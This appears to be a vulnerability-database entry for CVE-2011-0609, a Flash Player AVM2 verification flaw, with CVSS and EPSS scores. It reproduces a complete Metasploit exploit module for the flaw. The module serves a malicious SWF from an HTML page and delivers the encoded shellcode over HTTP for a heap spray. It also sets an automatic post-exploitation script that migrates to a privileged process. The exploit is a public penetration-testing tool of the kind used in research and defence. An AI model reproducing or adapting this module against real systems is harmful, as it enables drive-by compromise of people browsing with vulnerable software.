9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
0.972 High
EPSS
Percentile
99.8%
This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for the RSA attack in March 2011. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
vulnerability that was used for the RSA attack in March 2011.
Specifically, this issue results in uninitialized memory being referenced and later
executed. Taking advantage of this issue relies on heap spraying and controlling the
uninitialized memory.
Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several
other browsers. DEP does catch the exploit and causes it to fail. Due to the nature
of the uninitialized memory its fairly difficult to get around this restriction.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bannedit', # Metasploit version,
'Unknown' # Malcode version seen used in targeted attacks
],
'References' =>
[
['CVE', '2011-0609'],
['OSVDB', '71254'],
['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
['URL', 'http://www.adobe.com/devnet/swf.html'],
['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],
['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {}],
],
'DisclosureDate' => '2011-03-15',
'DefaultTarget' => 0))
end
def exploit
path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf" )
fd = File.open( path, "rb" )
@swf = fd.read(fd.stat.size)
fd.close
super
end
def on_request_uri(cli, request)
trigger = @swf
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
shellcode = payload.encoded.unpack('H*')[0]
obj_id = rand_text_alpha(rand(6)+3)
if request.uri.match(/\.swf/i)
print_status("Sending Exploit SWF")
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
return
end
# we use a nice trick by having Flash request our shellcode and load it for the heap spray
# src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
if request.uri.match(/\.txt/i)
send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
return
end
html = <<-EOS
<html>
<head>
</head>
<body>
<center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="#{obj_id}" width="600" height="400"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{get_resource}#{trigger_file}" />
<embed src="#{get_resource}#{trigger_file}" quality="high"
width="320" height="300" name="#{obj_id}" align="middle"
allowNetworking="all"
type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/go/getflashplayer">
</embed>
</object>
</center>
</body>
</html>
EOS
print_status("Sending #{self.name} HTML")
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
0.972 High
EPSS
Percentile
99.8%